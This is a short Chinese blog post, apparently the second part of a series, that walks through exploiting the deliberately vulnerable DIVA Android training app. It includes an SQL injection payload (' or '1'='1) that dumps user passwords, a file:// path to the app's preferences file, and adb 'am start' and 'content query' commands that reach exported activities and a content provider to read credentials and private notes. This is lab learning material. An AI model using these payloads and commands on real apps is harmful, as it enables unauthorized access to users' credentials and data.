接上一篇没写完的文章《Android App漏洞学习(一)》,下面继续剩下的几个部分。
打开日志:
adb logcat
输入一个单引号,在日志中可以看到报错信息,存在sql注入。
输入' or '1'='1,可返回所有用户密码。
可访问本地的任意文件,输入
file:///data/data/jakhar.aseem.diva/shared_prefs/jakhar.aseem.diva_preferences.xml
查看AndroidManifest.xml文件中暴露的activity组件:
利用am(Activity Manager tool)启动暴露的组件,来绕过权限控制:
adb shell am start jakhar.aseem.diva/.APICredsActivity
adb shell am start -n jakhar.aseem.diva/.APICredsActivity -a jakhar.aseem.diva.action.VIEW_CREDS
同时也可以使用drozer来完成:
输入 adb shell am start jakhar.aseem.diva/.APICreds2Activity,并没有出现PART9中的情况,添加了验证PIN码。
查找暴露的Content Providers组件:
然后查找包含content:// 的smali文件。
$ grep -lr “content://” *
查看私有日志内容
$ adb shell content query –uri content://jakhar.aseem.diva.provider.notesprovider/notes
另一种方式:使用drozer: